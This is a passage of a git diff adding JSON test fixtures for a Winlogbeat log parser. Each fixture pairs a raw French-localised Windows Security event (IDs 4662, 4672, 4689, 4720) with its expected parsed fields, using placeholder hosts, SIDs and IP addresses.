l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}",
+    "event": {
+      "action": "Directory Service Access",
+      "code": "4662",
+      "kind": "event",
+      "module": "security",
+      "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T09:07:11.844000Z",
+    "action": {
+      "id": 4662,
+      "outcome": "success",
+      "properties": {
+        "AccessList": "%%7688\n\t\t\t\t",
+        "AccessMask": "0x100",
+        "AdditionalInfo": "-",
+        "HandleId": "0x0",
+        "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}",
+        "ObjectServer": "DS",
+        "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}",
+        "OperationType": "Object Access",
+        "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}",
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0xc2b9d138",
+        "SubjectUserName": "ACCOUNT01$",
+        "SubjectUserSid": "S-1-2-3"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "12345678-1234-5678-9012-345678901234",
+      "id": "abcdefab-cdef-abcd-efab-cdefabcdefab",
+      "name": "ACCOUNT01",
+      "type": "winlogbeat",
+      "version": "8.12.2"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "account01",
+      "id": "11111111-2222-aaaa-bbbb-333333333333",
+      "ip": [
+        "1.2.3.4"
+      ],
+      "mac": [
+        "00-11-22-33-44-55"
+      ],
+      "name": "account01",
+      "os": {
+        "build": "17763.6414",
+        "family": "windows",
+        "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+        "name": "Windows Server 2019 Standard",
+        "platform": "windows",
+        "type": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "hosts": [
+        "account01"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "ACCOUNT01.domain.local",
+      "event_id": "4662",
+      "keywords": [
+        "Succ\u00e8s de l\u2019audit"
+      ],
+      "logon": {
+        "id": "0xc2b9d138"
+      },
+      "opcode": "Informations",
+      "process": {
+        "pid": 744,
+        "thread": {
+          "id": 864
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "476080242",
+      "task": "Directory Service Access"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json
new file mode 100644
index 000000000..59c3d35b3
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4672.json
@@ -0,0 +1,82 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}"
+  },
+  "expected": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}",
+    "event": {
+      "action": "Special Logon",
+      "code": "4672",
+      "kind": "event",
+      "module": "security",
+      "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T09:08:50.647000Z",
+    "action": {
+      "id": 4672,
+      "outcome": "success",
+      "properties": {
+        "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege",
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x40c158b6",
+        "SubjectUserName": "USER01-WIN$",
+        "SubjectUserSid": "S-1-2-3"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456",
+      "id": "11111111-aaaa-2222-bbbb-333333333333",
+      "name": "AGENT",
+      "type": "winlogbeat",
+      "version": "8.11.1"
+    },
+    "host": {
+      "name": "USER01-WIN.domain.priv"
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "user": [
+        "USER01-WIN"
+      ]
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "USER01-WIN"
+    },
+    "winlog": {
+      "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}",
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "USER01-WIN.domain.priv",
+      "event_id": "4672",
+      "keywords": [
+        "Succ\u00e8s de l\u2019audit"
+      ],
+      "logon": {
+        "id": "0x40c158b6"
+      },
+      "opcode": "Informations",
+      "process": {
+        "pid": 828,
+        "thread": {
+          "id": 27812
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "288206963",
+      "task": "Special Logon"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json
new file mode 100644
index 000000000..e5beffcf5
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4689.json
@@ -0,0 +1,88 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}"
+  },
+  "expected": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}",
+    "event": {
+      "action": "Process Termination",
+      "code": "4689",
+      "kind": "event",
+      "module": "security",
+      "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T09:10:13.534000Z",
+    "action": {
+      "id": 4689,
+      "outcome": "success",
+      "properties": {
+        "ProcessId": "0x1df8",
+        "ProcessName": "C:\\Windows\\System32\\process.exe",
+        "Status": "0x0",
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x3e7",
+        "SubjectUserName": "ACCOUNT_01$",
+        "SubjectUserSid": "S-1-2-3"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+      "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee",
+      "name": "AGENT",
+      "type": "winlogbeat",
+      "version": "8.11.1"
+    },
+    "host": {
+      "name": "ACCOUNT_01.domain.priv"
+    },
+    "log": {
+      "level": "information"
+    },
+    "process": {
+      "executable": "C:\\Windows\\System32\\process.exe",
+      "name": "process.exe",
+      "pid": 7672
+    },
+    "related": {
+      "user": [
+        "ACCOUNT_01"
+      ]
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "ACCOUNT_01"
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "ACCOUNT_01.domain.priv",
+      "event_id": "4689",
+      "keywords": [
+        "Succ\u00e8s de l\u2019audit"
+      ],
+      "logon": {
+        "id": "0x3e7"
+      },
+      "opcode": "Informations",
+      "process": {
+        "pid": 4,
+        "thread": {
+          "id": 620
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "1564712",
+      "task": "Process Termination"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json
new file mode 100644
index 000000000..96e08b538
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4720.json
@@ -0,0 +1,127 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}"
+  },
+  "expected": {
+    "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":47